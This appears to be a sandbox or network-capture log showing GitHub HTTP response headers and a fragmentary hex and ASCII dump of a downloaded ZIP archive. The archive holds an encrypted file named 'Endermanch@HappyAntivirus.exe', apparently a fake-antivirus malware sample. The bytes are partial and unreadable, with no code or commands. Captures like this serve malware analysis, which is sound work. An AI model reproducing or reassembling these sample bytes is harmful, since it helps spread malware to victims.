                                                                                                                                                            ETag: "bb71b3fc58fb603cf14e33295d1c8eaf2a0ad05101b7a8b78df809147209e36e"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 9B5A:0543:E4C62A:F30433:63359351
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:05 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6980-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455506.649934,VS0,VE267
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 71785f17ed52cbc289705cac9280f3bf8d572d62
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:05 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:05 UTC11818INData Raw: 50 4b 03 04 14 00 01 00 08 00 1c 34 33 4c d9 8f 00 b3 16 43 1a 00 00 a2 1e 00 1d 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 48 61 70 70 79 41 6e 74 69 76 69 72 75 73 2e 65 78 65 f8 2b 0e 2e 8c 29 68 4b e2 fb 48 16 3b 20 4e 07 3a 4e 83 02 e6 8c a5 48 55 e4 32 b4 95 93 c6 a0 c3 7c ab 92 e0 87 d0 02 d5 04 78 62 70 65 75 9a 97 86 11 34 98 97 cd 97 73 74 dc 2c 4f 22 09 b0 c7 96 32 1d dc ca 93 24 ea 9d 57 89 17 31 56 cd df 61 9d e8 1e 3e f6 5c 66 8d 23 70 99 5c 0c 9a 19 24 e2 d8 c2 3c 6d a8 d2 5a be fc 3a 13 61 f6 f5 7a b5 d9 f8 42 70 0a 62 f9 42 c3 b2 50 ae e2 70 4f 5a 25 72 a4 ee b3 0f 10 eb e1 04 4a 1a c8 a6 26 29 7b ed 6e 8c cf 45 da 01 e7 d0 73 ba 2b 43 92 58 a7 d6 5f be fa 1e 84 cd ad fd 63 14 66 6a db 88 d7 78 2b d4 d3 70 17 58 a2 ea 55 e1 92 3a 15 2f 21
                                                                                                                                                            Data Ascii: PK43LCEndermanch@HappyAntivirus.exe+.)hKH; N:NHU2|xbpeu4st,O"2$W1Va>\f#p\$<mZ:azBpbBPpOZ%rJ&){nEs+CX_cfjx+pXU:/!
                                                                                                                                                            2022-09-29 12:45:05 UTC11819INData Raw: b5 53 d3 9c b3 09 c1 8e 8c f4 67 13 a1 5b 47 b1 d0 aa e0 fb 1c c7 d6 a4 30 fc 4a a5 34 07 ec cd 83 87 f6 d1 be e0 e7 42 ed c5 8e b1 c1 fb 18 a1 1d 7b 82 5b 5e 57 83 e3 52 2c 47 84 51 08 27 7e f3 6c 32 4f 33 4c 67 e7 1d fd 64 b3 b4 e9 5a 09 d2 b9 c6 a9 41 4d 82 2d ec 34 1d 3c 3b e6 19 27 57 7f 20 ac f2 17 37 09 40 c7 3a 92 b3 bd 3e 5f 62 2d 64 af ab 22 e0 c6 f8 66 1f 96 a8 77 7d 9d ba fd 05 f3 0b 0a 44 01 40 5c b8 e9 d3 a4 fa df a3 95 ef 04 64 e0 5d 73 fb b0 09 b3 35 b8 6b d4 3d 80 e2 f0 d4 31 54 37 de ee 08 59 59 12 87 e6 0c 82 d8 a3 78 2a b1 86 1c 7d 2d 26 35 5c d7 34 9e 19 d1 88 93 ac d3 df 9f 15 80 92 98 f0 8b 67 17 ce c6 0c 1d 0f 12 d2 5f 6d b1 8a 77 c0 ef 05 ce 9a 78 a4 0d 8c be c0 7c 69 89 1b 48 74 e0 be 58 bb 17 bd b7 c2 f1 b2 20 e8 76 eb db 9d 3c
                                                                                                                                                            Data Ascii: Sg[G0J4B{[^WR,GQ'~l2O3LgdZAM-4<;'W 7@:>_b-d"fw}D@\d]s5k=1T7YYx*}-&5\4g_mwx|iHtX v<
                                                                                                                                                            2022-09-29 12:45:05 UTC11821INData Raw: 1e ac cf 08 73 95 5c 23 20 a5 db 01 3b 98 84 42 aa 9e 70 c8 9c a8 a5 de d6 08 e3 28 8b 65 ba 2e 60 62 ec b8 42 43 03 13 18 93 d2 b5 a3 11 7a a1 85 e5 96 13 1e 4d 93 43 5c c1 39 77 59 59 28 e1 ea 24 90 96 a7 3d 7c 2c 49 20 cc 89 3c a3 b0 47 94 41 8b 82 e6 17 ec 0a 01 f9 26 73 11 ea 52 d3 c3 b3 23 2a 97 61 a3 08 2b fe be 6c 4e 32 dd e9 29 cb 7f 05 03 9c 36 0d 25 1b be fc ec 98 69 60 81 bd 0c c1 ec f6 53 52 a1 2b a2 f4 99 d5 f9 33 74 8e 4f 15 49 93 5b 65 c2 96 a4 32 ae 9a 2e 19 42 1f 0d 7f c2 46 20 0b 40 ed 95 98 a8 ff 13 8a ea bf 37 2a d1 ac 87 73 73 a3 f5 19 1e ef 3e a5 0c 06 c1 4e 12 6d 33 78 c2 d3 ff 6f 2e 0a 04 2a 2a d5 a9 36 8d de 19 11 02 07 4d 07 6f 19 d0 41 97 15 47 76 b7 b4 6b 54 3a 42 cf e3 56 5c dc 5b 75 8c b1 ca 36 1c 12 20 08 e6 b3 b6 c0 f6 2e
                                                                                                                                                            Data Ascii: s\# ;Bp(e.`bBCzMC\9wYY($=|,I <GA&sR#*a+lN2)6%i`SR+3tOI[e2.BF @7*ss>Nm3xo.**6MoAGvkT:BV\[u6 .
                                                                                                                                                            2022-09-29 12:45:05 UTC11822INData Raw: ac 43 2f a2 90 f0 31 90 f4 64 d2 ad 64 7e d3 7a 52 03 98 51 5f 4c 3e 3b 9d 64 51 19 57 c8 8d 75 ec a6 11 e6 36 43 ba 68 f3 45 3a 90 5b da 25 cf ca 35 d7 d6 dc f2 82 45 32 12 0f a0 13 f3 1e c0 46 7d 6e 18 bc 45 6a 23 85 eb 55 2f 5c ed 44 86 e5 7d 7f 3c c3 95 77 de ac cd b1 6e b1 cf c3 ef 36 8b 4f ae 72 08 c8 c4 98 c1 de cc 7e af 7c cc d6 dd 4b cc 87 db eb 52 41 ea aa df 57 09 c0 22 ae c8 62 b5 15 e5 24 4b df 86 9a 5e a4 dc d1 0c 4c dc b9 fc c3 07 40 fe ac 1d 94 f3 f7 df c4 4a a3 de a9 a2 a4 ce c3 d6 4c 0e 5e 5d 0c ed 5f 97 59 fe 3f 6b f4 0f 90 44 98 1b 26 48 a4 ff d5 f8 7e 02 1e 88 1d 00 c4 f9 3f 5e 17 95 33 69 39 0e 47 1c de f3 47 cb f4 7c 39 21 59 fc 1d 14 fe ea a0 9e 40 3c 90 83 b1 e9 70 fc fb 6a 6a 15 56 6f c9 1b bc 73 78 23 e5 9c 25 9c 80 61 0b a6 9e
                                                                                                                                                            Data Ascii: C/1dd~zRQ_L>;dQWu6ChE:[%5E2F}nEj#U/\D}<wn6Or~|KRAW"b$K^L@JL^]_Y?kD&H~?^3i9GG|9!Y@<pjjVosx#%a
                                                                                                                                                            2022-09-29 12:45:05 UTC11823INData Raw: 58 a6 6f b4 b3 b2 32 c5 1d 5c 93 dd 85 fa 61 51 19 8f 8a e9 8a 7f bc d3 17 bf cc 5c 62 74 e7 3f 0f 19 95 91 7a f0 80 29 db a0 3f 13 1c 12 5a 76 54 c3 82 ba 0a 63 7d 71 31 a4 21 20 fb c6 97 5c 25 b2 be a7 e6 d3 50 28 1d 4a 20 b2 5c 11 1f 00 f4 6c 0b c0 dc 02 79 0f f6 70 5a 26 8f 1e 32 89 1e 1e 7c 52 3f 27 93 43 2a ad 4f e5 56 4c 09 0d d1 4f 47 4f 6b 7b 96 2d 6a ff 95 80 12 6a 78 9c f6 7a fc bf 77 14 cc 3e cf aa 64 8a e0 4c 0c dc 20 18 01 a5 b6 62 fa bb fe 32 86 35 0e 5d 93 08 87 ab 8c 07 3f 15 00 94 2e d8 52 8c 02 bf 48 9a c4 76 33 41 29 6d c5 d3 0e e1 0a 01 5f 97 69 9d d8 a1 48 22 28 64 9d d6 3a 88 38 2e a7 2a d2 41 01 64 f4 f1 82 70 d4 7a d9 8e 8d ab ec d4 fd 58 81 2e 6e e3 af 22 a8 e8 bb d3 ad cc db 36 26 3b 3d 72 82 e4 2e 9b 8e ec fd 2e e7 d4 6d 8d 3c
                                                                                                                                                            Data Ascii: Xo2\aQ\bt?z)?ZvTc}q1! \%P(J \lypZ&2|R?'C*OVLOGOk{-jjxzw>dL b25]?.RHv3A)m_iH"(d:8.*AdpzX.n"6&;=r..m<
                                                                                                                                                            2022-09-29 12:45:05 UTC11825INData Raw: a6 e2 2e ac 4a 78 04 36 8f 2c 37 5c cb 4a 01 d5 6a 23 a3 ff e4 b8 b6 c3 45 cb 06 1e 1a 8b a8 09 33 61 8c 3f 17 6a f3 80 a3 40 76 50 4b 16 2b 50 05 4e a6 e4 ee 96 6f 8f 0e 92 41 0d 1c 49 6c ae d7 36 75 3d 5f bd 47 e2 f4 5f ea 96 9c c7 09 5d 56 a6 e3 4d f5 53 94 cb c2 2b 96 98 0e 46 cd 3f 9f 36 48 da a4 a4 77 f4 ac 22 e0 07 ba b2 f1 44 99 ed 6d fd e8 04 de 58 51 0f 28 f3 c0 33 ab c9 43 c2 96 18 d4 fa 80 1a 07 cb 9b 26 00 fa d4 59 98 46 24 ce 27 0c c2 ec d1 a8 8e f3 57 f7 ab b2 cb 8a 20 22 77 4c 51 10 8d e1 ae 9f ba 71 23 e8 81 a1 58 8d 11 a8 9b d6 85 0a db d8 02 9c 43 e5 45 bc ad 73 ec 82 29 ae 64 82 ca 42 65 ce 94 04 d6 76 e3 d6 07 15 ed ba 48 94 5a 5b 18 41 81 38 80 bf bd 3d e3 7d c0 93 a1 9f 42 3a 78 d0 05 23 0e ac a4 b5 46 cb e9 30 f4 70 44 b4 38 0f 8f
                                                                                                                                                            Data Ascii: .Jx6,7\Jj#E3a?j@vPK+PNoAIl6u=_G_]VMS+F?6Hw"DmXQ(3C&YF$'W "wLQq#XCEs)dBevHZ[A8=}B:x#F0pD8
                                                                                                                                                            2022-09-29 12:45:05 UTC11826INData Raw: 00 19 df e4 2b 56 05 42 2d 7f 06 0a cf e6 b0 16 40 0f 72 65 c0 59 55 3d 81 b6 78 fb ef 52 c3 6b 1b c6 04 16 39 fe d7 b2 04 0f b9 72 a7 ec f3 c4 7b e0 00 95 12 df 45 3c b1 9c 98 f3 5d 8b 52 9f 1a 4e 15 7b c2 ae 39 75 96 96 9b 19 c3 ab 81 62 8a d5 c5 a5 da 9e cf 40 43 0a 49 47 12 69 31 da fe 57 c4 3b f1 92 4d a8 8c d7 60 e2 29 50 e4 4a 95 27 0b 19 0d 75 b5 7e 1a 03 66 85 cc 14 c2 47 4b 33 e8 c5 57 99 1a f9 57 a6 4d 38 c4 f6 a3 0f 1a 96 a9 fb 8d ea 1e 5c bc e0 d6 df 32 5c 6c a1 c9 01 cf 99 ea 14 71 c3 33 7c b7 ae 34 21 2f 82 13 39 02 d8 28 ed b3 2a 2b 98 2f 93 d8 cb 04 0f 47 0f 2e 17 32 d2 b5 b8 9f b4 73 0c 3d 79 6a 4d 16 d2 73 2d ee 9b 42 9e 8b 68 59 49 72 b5 f5 87 38 5d 80 dd cb d7 25 5b 90 49 2a 3e 68 ee 6d c2 19 66 84 a8 d2 ea 7c 01 e2 49 3c 90 4c 9d 12
                                                                                                                                                            Data Ascii: +VB-@reYU=xRk9r{E<]RN{9ub@CIGi1W;M`)PJ'u~fGK3WWM8\2\lq3|4!/9(*+/G.2s=yjMs-BhYIr8]%[I*>hmf|I<L
                                                                                                                                                            2022-09-29 12:45:05 UTC11827INData Raw: fa 62 b1 84 fb bb e5 1b ed a8 6e 7d bd 10 db 51 31 5b d4 ae 56 17 20 de d6 d3 88 cf 52 dc 44 7c 86 38 f2 5f 12 b2 15 97 e2 82 3f 35 4a 0c 86 9d ac ff bb fe 0e 4f de b2 8e 01 b7 91 f5 3d 0c 4c cd 21 4d 32 39 50 82 ce 54 3d d3 1c 25 3e 13 64 a7 c3 7b 18 ed 9d fb fe a9 c1 11 7f 09 99 59 ce c0 be 3d 9c 16 3a 2c ad e8 bc 69 86 a0 c1 fc 8d d0 06 6b 26 0a b9 24 68 5d 76 ec b1 1e 00 d1 43 53 41 9a 68 8a f8 8f 11 4c a9 2a 6c 27 c9 a7 0d b3 77 ac aa f2 07 99 5b e1 c8 76 43 b6 24 f1 d0 8d 3f 69 36 37 fa 2a 11 5b 1b f5 79 0f c9 a4 1e 33 29 48 a0 ce bd 12 d6 01 c5 2b 99 80 57 03 90 63 02 4d 55 da 27 37 57 55 41 e3 99 f0 c3 03 d4 0c 65 9c bb b6 35 b1 31 ca fa 0d 24 1d fa 95 2c 65 05 da 6f 30 5c 12 df a2 c0 5d 45 68 3a 92 86 a2 ff 1d 90 29 eb 84 a8 3c 84 c2 09 f6 b8 38
                                                                                                                                                            Data Ascii: bn}Q1[V RD|8_?5JO=L!M29PT=%>d{Y=:,ik&$h]vCSAhL*l'w[vC$?i67*[y3)H+WcMU'7WUAe51$,eo0\]Eh:)<8
                                                                                                                                                            2022-09-29 12:45:05 UTC11829INData Raw: ab f3 b2 67 e5 e2 c9 1f 70 e0 7c b5 59 b8 0d de 9f dd c6 80 b6 2d 74 d9 7f 1a 05 6f d6 2b ac 62 44 4e 63 23 00 27 69 cb 29 06 2d 66 27 a0 d2 54 1a b9 9e 81 a4 80 64 d3 f9 f7 d7 cd 51 b5 18 8b 53 9f c6 5a 97 da b3 10 69 2f 18 d6 f2 9d 2a db d9 47 8e e0 a2 7b 8b 9d f0 9c 74 1f bf 45 ca 29 14 94 0a 67 d7 3e 97 ec d6 fb d4 99 9a f2 5d 61 39 da c9 d8 8f 30 85 28 95 ea a3 a4 2e 46 e3 b0 01 5d bd 43 93 80 e4 5d c2 28 1c 77 60 55 62 3e 38 69 5c 68 5d 46 48 6e e3 d3 29 15 ba e2 83 29 3e dc a1 9d 9a 16 0d 1e c4 f8 b2 45 df 8f 14 9a 41 2c 76 b0 3c 1c 70 1a f0 41 c2 a1 9d 10 2c 8c 38 7f ce ff 19 94 b1 ef c3 8f 63 36 3b d1 e4 1c fe 9b 16 18 e6 60 8e 6b 6c 24 e3 b1 c5 cf b2 b6 db 63 09 d0 56 be fa 89 da af 35 dd e3 75 0d 58 8e 5d be b8 a5 47 e2 50 1e c2 0a fe 6a 15 29
                                                                                                                                                            Data Ascii: gp|Y-to+bDNc#'i)-f'TdQSZi/*G{tE)g>]a90(.F]C](w`Ub>8i\h]FHn))>EA,v<pA,8c6;`kl$cV5uX]GPj)
                                                                                                                                                            2022-09-29 12:45:05 UTC11830INData Raw: 9e c4 23 55 12 24 a7 12 02 48 ed 07 3e 34 0e 43 40 da 49 94 fd 46 15 6b 79 90 b6 90 af 07 b6 a6 5c 2e 0c 77 43 2e 73 0f a2 69 b7 64 78 f5 b0 c4 de 29 2b 33 2a 8b d6 6e e8 ba 13 4f a6 c2 78 62 50 1d a0 07 43 f4 de 48 89 2f 20 aa fd b1 53 21 be 07 c4 f4 5f fa ed 58 b2 aa 07 a1 3b e0 59 8c 65 a9 40 da 10 3e c5 fa 16 c4 65 33 dc 4e e9 bc 8e de 04 07 f1 98 41 1f 5d 7e 89 72 e1 e4 0c bc 9f 76 68 49 9b 1d e2 24 b8 2a 75 cd cd 0e 8d 91 fa 79 18 64 6b 70 18 73 03 5e 40 e6 8e cb 00 13 24 d2 64 17 bf b5 37 d6 c1 05 56 46 2d d8 d7 d6 e2 1c f3 97 92 7b 29 5a 2d 15 ee e3 a1 5b f3 4b cc 97 ff 64 e3 d0 6c c9 13 db 6a 91 c1 0a 14 ea ba 24 2b a0 11 95 c2 1a 82 f0 b4 be aa f7 3e 2b 88 66 35 cd 77 6b 07 13 92 ff 41 59 b5 9e eb 72 e4 f6 c3 fe 34 5b 0c 31 2e df b9 6a 6d 28 25
                                                                                                                                                            Data Ascii: #U$H>4C@IFky\.wC.sidx)+3*nOxbPCH/ S!_X;Ye@>e3NA]~rvhI$*uydkps^@$d7VF-{)Z-[Kdlj$+>+f5wkAYr4[1.jm(%
                                                                                                                                                            2022-09-29 12:45:05 UTC11831INData Raw: 38 07 55 91 f3 d6 36 13 d1 8d 0e b3 8d ed 0c 36 0a e7 9f a2 6e f9 53 0c 9b 99 b2 01 3f 04 e5 88 85 7c 5d 59 d0 67 f4 53 97 ed 03 42 f0 f9 99 2f 5a 50 f2 ef 9a c1 8b 2d 3d ed d8 3d e9 17 b3 95 58 fc 93 c7 ee 4e 08 37 18 ed 1f 42 5d 02 4c 94 e7 77 e3 3c 07 a4 af 05 0b c0 a3 1b d2 ac a8 94 8d 1b aa cf 6a 29 c6 cb d3 fd 91 57 3c 9a ec b3 5c 31 e5 ac ee b8 49 a0 7e d1 40 a3 cf 46 7b 8d 57 b3 d7 6b 7b 1f ad 84 9b 81 a4 37 c9 41 03 fb ac 7b 0e ce 08 0a d4 63 ed 6d 5f 12 2c 72 12 0f e6 ff 83 47 08 23 30 b7 52 a0 a7 af 18 af f2 44 22 92 45 aa fd 23 20 3b cc af 74 23 bb 45 f5 4b 54 12 21 77 3a 39 52 b9 22 90 f4 bd 72 cc 59 2b 3c 1d 6b 7a 11 28 c9 02 86 e5 b3 91 26 99 5f e3 c7 44 b7 61 f3 04 41 cd 8e ca e7 ef 0c 04 65 30 aa 49 08 49 9e 0b ad 77 de ee 4a 8a 37 fa de
                                                                                                                                                            Data Ascii: 8U66nS?|]YgSB/ZP-==XN7B]Lw<j)W<\1I~@F{Wk{7A{cm_,rG#0RD"E# ;t#EKT!w:9R"rY+<kz(&_DaAe0IIwJ7
                                                                                                                                                            2022-09-29 12:45:05 UTC11833INData Raw: 0d a0 75 8c fd 8d cc 9f 2d 8b 08 d8 61 e9 fc 2b 5e 70 43 b8 b1 11 b5 40 41 16 04 eb 9f a9 28 01 21 32 28 39 dd 2a 0b e8 3c 6f e4 26 a2 ab 45 94 dd f7 6e db ab 7a 2b 1d 48 a6 83 94 18 0c 25 9b e5 fb af da 93 c0 3c 93 6b b1 0a df 61 69 ee ca 76 1f 3e bd 6f 9b f7 a4 ab 3f 1e fc 82 b4 ec 62 26 ca 94 26 1a c1 3c 65 45 6c 37 d2 02 4e 08 19 67 3a 67 a3 97 b5 e5 a4 82 1c ab b5 20 2b eb a1 85 d0 d9 0d 4f bb a0 e6 a5 89 21 b3 7e 9c 30 79 cd 03 68 97 b9 7e 4c 9e 99 24 a4 b8 1d 89 3e 7e c4 4b cd 3d 84 41 76 99 ca 2e 2d 00 10 2b 43 d9 bf dc 41 04 07 e8 2a 8f 3f c9 cc 8a 1d 1c fb 45 0e 12 11 23 ea 7c 87 ab dd ba 67 fe dd c3 e2 f0 98 1f d7 28 8e ec 57 03 8e 72 65 95 c8 e2 4f 18 34 ae 19 26 93 79 18 e4 2e 8a 53 dd 74 2e 7e 0b 6d 1f 0b d1 76 c1 2a 6d ef b1 a0 65 84 33 05
                                                                                                                                                            Data Ascii: u-a+^pC@A(!2(9*<o&Enz+H%<kaiv>o?b&&<eEl7Ng:g +O!~0yh~L$>~K=Av.-+CA*?E#|g(WreO4&y.St.~mv*me3
                                                                                                                                                            2022-09-29 12:45:05 UTC11833INData Raw: f0 b4 be 66 ec 13 a3 26 df 89 3c ed a2 81 08 fb f7 8b 58 35 ed ec a7 25 20 1d 90 a4 79 64 57 b8 b8 c5 a8 3a 5e 63 69 e0 a2 62 df e4 6c 9d 19 56 8f 30 bd d7 d8 0b 64 1a 28 2f 6d 45 3c 08 69 73 cc f1 f9 f7 b1 97 63 6d cd e3 5e ba 11 bf ab 1d 98 88 37 c8 08 62 3b a4 10 43 bf 13 eb 4a 12 08 a8 b6 d9 86 f6 75 7e e5 46 f9 02 9b 9d a4 08 b6 3a aa e5 af 6f 05 37 ed 2b 03 f1 a1 1a ec eb fe 8e 8d 14 16 d1 46 8a 40 8d 44 3a 30 c2 8b 02 89 75 38 29 e9 c6 4c c7 5f 0d 72 9e 85 1e 23 9e df 6a fb 22 0c e9 fe f0 d8 80 52 f1 54 d0 c5 23 d4 9e 41 89 98 ed b2 be d0 7f 07 93 5c cc 1e 81 63 e7 2f 75 c9 a7 ab 19 6a 5f f7 1b 08 9c 02 91 d9 5d 6e 4d 41 c1 87 62 cf a8 e5 8f 5c 86 2d 9b 0e 6d 5c ad 72 21 75 58 9c 52 fd dd 6c fe ea a9 02 83 e2 7e 5d bd 8f 3c 2d 87 57 36 dc 45 ae 56
                                                                                                                                                            Data Ascii: f&<X5% ydW:^ciblV0d(/mE<iscm^7b;CJu~F:o7+F@D:0u8)L_r#j"RT#A\c/uj_]nMAb\-m\r!uXRl~]<-W6EV
                                                                                                                                                            2022-09-29 12:45:05 UTC11849INData Raw: b0 70 85 fe 40 02 51 a2 3e 81 ae de 1b 1d 21 9b 9e 20 f8 46 91 16 32 5b a5 a7 93 41 39 43 4a 58 04 cf e8 e5 4d cc 27 89 40 8a 9e 1d 84 66 81 3b 8b fe e5 0b 0d 24 cb 12 96 b3 fc 9e 2d cb 40 e9 4c 83 55 24 18 44 50 48 20 9a a2 c1 c0 4a 7b e7 16 fe 32 8f e9 fb 59 76 87 48 97 f2 ac 4d 15 16 b6 15 aa 70 ac 23 97 e6 8d 77 0f de 90 55 ca d4 60 61 ba ab 82 b3 20 a4 f6 ff 20 5f 94 42 2e 2a 2e 82 1a 48 f5 64 7f 5b e0 86 07 ac 37 3c 7f 56 a0 0d bf a8 7a 41 a2 7b 4e df be 7a 53 a0 68 2a bc ce d9 9c f4 8a 51 45 c6 b9 48 36 ae c0 af 25 2d 16 d1 12 a5 c0 6e 12 0d c5 60 58 d7 99 94 1d 43 7c bf 4c 14 68 20 68 46 24 d7 5b 22 78 60 98 69 19 a2 37 8f 64 75 8d 58 1f b9 ed c3 ff cd f3 fd 68 96 19 8c 20 b5 db 8d b1 66 ed 6c a0 04 fc 31 ab 22 45 6e 27 36 8a e2 0c 49 c9 c6 9a 84
                                                                                                                                                            Data Ascii: p@Q>! F2[A9CJXM'@f;$-@LU$DPH J{2YvHMp#wU`a _B.*.Hd[7<VzA{NzSh*QEH6%-n`XC|Lh hF$["x`i7duXh fl1"En'6I
                                                                                                                                                            2022-09-29 12:45:05 UTC11865INData Raw: 88 2b 99 83 4b 97 da 58 ec 15 c1 84 6d f7 39 3e 56 26 56 af 98 8d 8d 87 b8 1f fa fd 82 dd 32 e7 52 ba 35 a1 7f 76 e5 bf dc 13 5b 4f e9 9c b0 01 f5 f7 98 45 ab e9 29 1f f7 33 11 0d 1f 46 2a cd 3c 85 01 6a 2b c5 6e 90 9e 05 6c 9d 0d af 26 eb d9 40 05 fe a6 67 0f 8d ed 7f a4 39 c3 95 a6 26 f0 32 b4 fa 41 52 02 f6 cc c5 4f 6e 70 f5 a9 3d 68 82 e1 3d da 4c e4 52 aa c2 a0 21 bf a4 81 83 80 05 99 02 3b 5a 58 18 c9 61 4e 13 8e 62 26 cc ed 4e 61 17 34 f4 c6 ff 04 f9 9a 12 7c 1b eb 9f 94 0e 6a 02 c0 21 e7 15 26 c3 34 04 d7 f6 b2 56 40 48 d9 d5 8f 74 b0 b8 1a f3 d2 51 57 b5 62 94 95 b6 60 95 ae f3 b2 04 67 02 7b f0 bd dd c3 62 94 79 e7 50 3b e5 57 a4 3b 60 d1 fe ec f7 03 4b fd 52 80 c5 51 f9 ac f2 27 b4 75 48 2b c9 89 5f 66 75 bd e3 d3 ef d2 e3 cd 49 67 fd 6a 84 4e
                                                                                                                                                            Data Ascii: +KXm9>V&V2R5v[OE)3F*<j+nl&@g9&2AROnp=h=LR!;ZXaNb&Na4|j!&4V@HtQWb`g{byP;W;`KRQ'uH+_fuIgjN
                                                                                                                                                            2022-09-29 12:45:05 UTC11881INData Raw: c6 8c c5 dd d7 5f 28 68 12 bd 1a b2 88 58 45 eb c1 c6 c5 64 80 9c e7 26 f6 ed 6e 86 58 2b ac 1e 38 dc 3e b5 d9 84 5e 8a 6d 8c ba 2a 7e ad d2 a7 06 f7 ce 1f bb e7 aa b0 c5 8a b2 9e b8 66 3f b8 e0 bb 8f 41 bd 70 b0 10 e1 32 a1 03 6d 84 4d 8f 02 8c c0 66 f0 3d 3a 0e 3a b8 8b f3 ff 2f 5a 0d 47 c5 b5 b6 2c 4e df 57 0d 89 9a 5d cd 43 c8 5f 0e d3 03 82 50 e8 70 1a 14 14 f4 d5 b6 5b 00 f7 bb f3 89 1d 55 d3 ce d5 aa 3e dd 8f ec db 03 19 1f 50 cc 3c 87 19 c3 a8 2b 28 1b ac 59 46 30 14 2d d8 1f 02 6f f8 1c c0 5b b6 d8 60 08 9a c8 12 58 3c 41 22 94 5d 7e 3f 79 30 54 4b 0a 7d 1d 4a df 4f c5 d3 03 26 93 88 e5 43 5e 31 29 08 44 06 01 bf 52 28 56 4b 0e ea 4b db de 1b 54 5c 91 63 31 bc 24 7a d2 e9 3e 8f d2 bc 8a a6 02 e6 8c fc bf 6f 29 52 4e 25 ce f6 d5 78 37 3f 67 14 99
                                                                                                                                                            Data Ascii: _(hXEd&nX+8>^m*~f?Ap2mMf=::/ZG,NW]C_Pp[U>P<+(YF0-o[`X<A"]~?y0TK}JO&C^1)DR(VKKT\c1$z>o)RN%x7?g
                                                                                                                                                            2022-09-29 12:45:05 UTC11897INData Raw: ff b0 87 fb 6d ac 3f 05 7c 89 cc 96 95 cc 98 d5 a1 f1 17 d5 50 72 77 4b 18 61 2e e9 12 2d b2 e4 26 58 84 31 b2 07 49 e5 91 ea e7 6e 35 78 0b 35 22 c2 be 7c d0 f5 1c 13 93 4d 62 0b 3a 85 a0 4f c0 fe 63 15 44 69 cc 1d 1e d0 ef 9e 7a a2 c1 00 70 3b 28 26 1d a8 52 a6 45 e6 e2 15 94 30 38 4a 17 28 30 db 96 a1 22 68 2b 56 e6 00 e0 d7 4e 8f 2c 08 d1 94 5d a4 be 79 4b 16 b5 dd d0 46 c2 6d 1e b7 d7 b2 26 b8 6c ec 0c b0 be 99 d0 b5 06 77 81 f2 af 72 dc fa 1b 7f cc 6e 08 09 0c 32 17 35 ba 04 57 b6 ee 66 fc 85 07 a8 c0 48 76 05 58 d8 d6 38 fd 33 60 f0 dc 5f af cb f0 5a 03 79 3a 52 6c e3 43 71 7d 9a 03 cf ed c0 04 1d b3 b9 f8 e5 56 56 57 99 ef 32 1a e7 9e c3 77 b4 06 27 93 87 b4 f4 74 d6 e8 46 d6 02 bc b6 e9 10 5c 9a bf 72 42 64 42 8e c0 c7 09 0e 1f b3 28 7a 62 b3 b9
                                                                                                                                                            Data Ascii: m?|PrwKa.-&X1In5x5"|Mb:OcDizp;(&RE08J(0"h+VN,]yKFm&lwrn25WfHvX83`_Zy:RlCq}VVW2w'tF\rBdB(zb
                                                                                                                                                            2022-09-29 12:45:05 UTC11913INData Raw: e2 e6 9b 97 db 79 dc ed 1e 59 d7 9d 72 93 10 e0 ff ea 07 52 b3 ca 91 53 70 5c a0 8c 36 f0 7d 75 c0 b5 97 f2 85 7f 33 db 3d f9 4a 0b e5 a8 fa b0 5d b7 11 64 2b d4 31 f4 82 8b 69 22 d2 1f 0d 13 96 a6 34 5d 36 9e 31 50 1f 7e cd 6e 0d 85 c0 d9 48 92 9c b1 83 0f b6 8d 30 9e 16 ef 73 2f 0b e0 92 9a 45 f2 3f e6 21 40 78 2b bd e1 8c e8 45 96 5c 11 a4 12 7a 9d 32 be f6 ef d1 5f 9b 48 f3 d8 70 eb 52 28 f6 14 9e 8e 19 be 4b 5a 1c d1 c7 b1 17 e4 c3 b4 b0 aa 5f 4c dc 77 22 86 8e 61 59 55 72 5a 4a af 81 dd 18 10 7a ac 1b 61 36 ab 6c 5f e0 03 76 74 95 38 e9 41 b6 a6 39 18 b1 b2 87 50 c4 5f 28 db d3 3c e5 2b b2 ed 07 bf 16 08 27 e1 bb dc 3a 0a 91 fd 6d a5 90 e1 ba d6 b3 ee 9a bb 3b c0 69 e6 80 9d bc 03 6a 6f 65 c4 8f d6 e1 24 82 c3 1b 30 44 4f 24 d2 6d 3e 49 0d 0a af 04
                                                                                                                                                            Data Ascii: yYrRSp\6}u3=J]d+1i"4]61P~nH0s/E?!@x+E\z2_HpR(KZ_Lw"aYUrZJza6l_vt8A9P_(<+':m;ijoe$0DO$m>I
                                                                                                                                                            2022-09-29 12:45:05 UTC11929INData Raw: 18 32 c5 d7 62 65 85 0e 5b 65 27 10 bb ff 25 a2 fd d4 ef 18 40 a2 d1 bf 49 2e 87 b5 34 b9 5a 4e d8 23 8d 53 44 6f f8 ab 0d 23 f5 b3 6f e9 70 d0 af 60 a9 f8 9e fb 2f 7f b2 c0 9d d6 5a a2 56 24 e7 18 97 4c 6c 78 f7 5d b6 97 9c 45 1f 91 3c c6 03 31 5b 69 4c 0a e0 9d c7 78 16 b2 5f f6 6d 14 25 de 1c a5 ae 07 a9 08 3b a9 09 f0 74 be ab 6e 19 02 f3 14 b3 7c d3 a4 fa 85 7e 58 7a f8 a3 f7 69 8d 63 f3 02 93 c6 1f e9 0e 6e 01 eb cd 1f a6 ae d1 25 5c 8c 78 3e 3d a1 3c c3 ac 15 24 71 ed 74 19 72 81 e7 29 4a 0b a3 eb 35 ef cf 31 39 d2 8a d0 7e 57 d3 e9 81 eb 6b 01 a7 db 94 08 a4 7e 47 d1 d3 a4 38 09 55 38 da 8d 2b 9d 5e c1 32 65 d0 05 db b8 49 10 f1 19 16 15 b1 f2 2e 36 50 b1 de 27 f7 ac 3d ba 15 6a 9b ba a3 78 6c b4 19 1c 